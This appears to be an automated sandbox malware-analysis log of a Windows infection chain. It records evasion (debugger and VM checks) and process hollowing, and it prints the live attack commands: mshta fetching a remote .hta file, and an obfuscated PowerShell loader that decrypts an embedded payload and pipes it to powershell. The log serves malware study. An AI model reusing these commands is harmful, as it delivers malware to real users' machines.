Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97609	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97499	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97390	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97281	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97169	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97062	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 96953	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 96843	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 96734	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 96624	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 96515	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199809	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199687	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199305	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199172	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197547	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197435	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197328	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197219	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197109	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197000	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196880	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196766	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196652	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196544	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196403	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196229	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196124	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196012	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1195854	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1195728	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1195608	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1195470	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1195295	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1195143	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1194979	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1194835	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1194719	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 100000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99879
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99765
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99655
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99546
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99435
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99325
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99209
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99078
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98936
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98822
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98718
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98606
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98484
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98374
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98264
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98156
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98046
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97936
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97797
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97685
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97564
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97424
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97292
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97180
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1200000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199865
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199744
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199618
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199448
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199323
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199199
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199043
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198916
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198764
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198627
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198467
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198331
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 100000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99875
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99751
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99609
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99500
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99388
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99265
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99146
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99019
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98890
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98781
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98672
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98562
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98453
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98342
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98218
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98109
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97979
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97859
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97750
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97631
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97515
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97390
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97278
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1200000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199829
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199704
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199590
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199469
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199359
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199250
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199110
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198888
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198781
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198657
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198532
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198422
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198297
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198185
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198078
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197954
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197836
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197730
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197586
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197471
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197344
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197235
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197094
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196985
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196875

Source: bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
Source: mshta.exe, 00000009.00000002.1863621793.0000019AC1767000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1858256707.0000019AC1766000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1856924692.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863133474.0000019AC1716000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2529557915.0000021C3382B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2531528743.0000021C38E58000.00000004.00000020.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1496845420.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1496845420.00000000007AB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000011.00000002.1635136687.0000029E32767000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}n
Source: Ucvuiswb.PIF, 00000018.00000002.1625890136.00000000005FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvvX
Source: powershell.exe, 00000011.00000002.1635136687.0000029E3275E000.00000004.00000020.00020000.00000000.sdmp, Ucvuiswb.PIF, 0000001A.00000002.1711968278.00000000005DB000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllaa

Source: C:\Users\user\AppData\Roaming\uc.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif

Code function: 23_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

23_2_0040CE09

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif

23_2_004019F0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Roaming\uc.exe

Code function: 19_2_02997AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,

19_2_02997AC0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif

Code function: 23_2_0040ADB0 GetProcessHeap,HeapFree,

23_2_0040ADB0

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	23_2_0040CE09
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	23_2_0040E61C
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_00416F6A
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_004123F1 SetUnhandledExceptionFilter,	23_2_004123F1
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	23_1_0040CE09
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	23_1_0040E61C
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_1_00416F6A
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_004123F1 SetUnhandledExceptionFilter,	23_1_004123F1
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	25_2_0040CE09
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	25_2_0040E61C
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_00416F6A
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_004123F1 SetUnhandledExceptionFilter,	25_2_004123F1

Source: C:\Users\Public\Libraries\bwsiuvcU.pif

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Roaming\uc.exe	Memory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Memory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 1E090000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Memory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Memory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 121D0000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Memory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Memory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 1E090000 protect: page execute and read and write

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Roaming\uc.exe	Section unmapped: C:\Users\Public\Libraries\bwsiuvcU.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Section unmapped: C:\Users\Public\Libraries\bwsiuvcU.pif base address: 400000
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Section unmapped: C:\Users\Public\Libraries\bwsiuvcU.pif base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\uc.exe	Memory written: C:\Users\Public\Libraries\bwsiuvcU.pif base: 2A5008	Jump to behavior
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Memory written: C:\Users\Public\Libraries\bwsiuvcU.pif base: 211008
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Memory written: C:\Users\Public\Libraries\bwsiuvcU.pif base: 239008

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW \| powershell -	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\uc.exe "C:\Users\user\AppData\Roaming\uc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $osfnkdw = 'aaaaaaaaaaaaaaaaaaaaaoega50v5wuo7zhydkcfzbjinq4p3h3rmsqozx56v9ct1bzutrzkwxrchczjinv9leat1ry1wlwkifuszfzqfe/ywmqadzxsneytupy+5le4m5em4w+ywzersnn/urcy8+ztg58q1h/+bzdob3w2o1z7qwzthsnzgxowwnyv7tmyxzckvr/w4wq5ilvqcut+dsc1oheaxo3ndd5i7/vznrbilxsn6hcnaactlxfrinfmskdcn8+7w2lqhnfd5fxx+lgvrrg0ld6mdkv9wdbx6qjfidrmhcmclwuj1bf5mnmwfno28v0dg8ts2l8miodvr6azf2v7aj+0kyrmlbddhywfi7okvra/3xzllb5bbqdqe0oot0jai3+7gtkwesgjwchgeuewtwqamcb6a7qrzrsbpayqu/wal9/nkc9cb9jhujr2itv9ek3kerad+eapojond7bqukjve9tlodwypko7ylwxtqf8wgzm0ja3mfkmwkgljtfbjt7ucygj4klx/zk01swb2yhhmutyge58lhzygfngyycqtkg4k9tn5i5bstesfzehotkeivad+ckvo0hl0r5uz5gqb2ew8dgcuwkpmexzvkk4b1gapu3smbdkvfrvuhgsjc5t6hhsztvvp6jz9v2fjj6ahm37dhgqwqsoihz9dfusra5c/+avs0ho38mgy4fjkp6ou6wm3p9bykwtvtrulafl604cotxxeoc6ge6trnaardid6zmwy1sykkettlg2js0b7n2fwa1gsa==';$jifvezk = 'cfrkugzlwwl4r2zhdlp1wlrocflzr3rfvutmamhetuc=';$ugiwrbah = new-object 'system.security.cryptography.aesmanaged';$ugiwrbah.mode = [system.security.cryptography.ciphermode]::ecb;$ugiwrbah.padding = [system.security.cryptography.paddingmode]::zeros;$ugiwrbah.blocksize = 128;$ugiwrbah.keysize = 256;$ugiwrbah.key = [system.convert]::frombase64string($jifvezk);$vpsle = [system.convert]::frombase64string($osfnkdw);$ubmsttpl = $vpsle[0..15];$ugiwrbah.iv = $ubmsttpl;$clyzavcnc = $ugiwrbah.createdecryptor();$evtppvfwq = $clyzavcnc.transformfinalblock($vpsle, 16, $vpsle.length - 16);$ugiwrbah.dispose();$darjcu = new-object system.io.memorystream( , $evtppvfwq );$wdjfzjy = new-object system.io.memorystream;$mtmsbjehy = new-object system.io.compression.gzipstream $darjcu, ([io.compression.compressionmode]::decompress);$mtmsbjehy.copyto( $wdjfzjy );$mtmsbjehy.close();$darjcu.close();[byte[]] $dvtmfgse = $wdjfzjy.toarray();$ghwdgw = [system.text.encoding]::utf8.getstring($dvtmfgse);$ghwdgw \| powershell -
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $osfnkdw = 'aaaaaaaaaaaaaaaaaaaaaoega50v5wuo7zhydkcfzbjinq4p3h3rmsqozx56v9ct1bzutrzkwxrchczjinv9leat1ry1wlwkifuszfzqfe/ywmqadzxsneytupy+5le4m5em4w+ywzersnn/urcy8+ztg58q1h/+bzdob3w2o1z7qwzthsnzgxowwnyv7tmyxzckvr/w4wq5ilvqcut+dsc1oheaxo3ndd5i7/vznrbilxsn6hcnaactlxfrinfmskdcn8+7w2lqhnfd5fxx+lgvrrg0ld6mdkv9wdbx6qjfidrmhcmclwuj1bf5mnmwfno28v0dg8ts2l8miodvr6azf2v7aj+0kyrmlbddhywfi7okvra/3xzllb5bbqdqe0oot0jai3+7gtkwesgjwchgeuewtwqamcb6a7qrzrsbpayqu/wal9/nkc9cb9jhujr2itv9ek3kerad+eapojond7bqukjve9tlodwypko7ylwxtqf8wgzm0ja3mfkmwkgljtfbjt7ucygj4klx/zk01swb2yhhmutyge58lhzygfngyycqtkg4k9tn5i5bstesfzehotkeivad+ckvo0hl0r5uz5gqb2ew8dgcuwkpmexzvkk4b1gapu3smbdkvfrvuhgsjc5t6hhsztvvp6jz9v2fjj6ahm37dhgqwqsoihz9dfusra5c/+avs0ho38mgy4fjkp6ou6wm3p9bykwtvtrulafl604cotxxeoc6ge6trnaardid6zmwy1sykkettlg2js0b7n2fwa1gsa==';$jifvezk = 'cfrkugzlwwl4r2zhdlp1wlrocflzr3rfvutmamhetuc=';$ugiwrbah = new-object 'system.security.cryptography.aesmanaged';$ugiwrbah.mode = [system.security.cryptography.ciphermode]::ecb;$ugiwrbah.padding = [system.security.cryptography.paddingmode]::zeros;$ugiwrbah.blocksize = 128;$ugiwrbah.keysize = 256;$ugiwrbah.key = [system.convert]::frombase64string($jifvezk);$vpsle = [system.convert]::frombase64string($osfnkdw);$ubmsttpl = $vpsle[0..15];$ugiwrbah.iv = 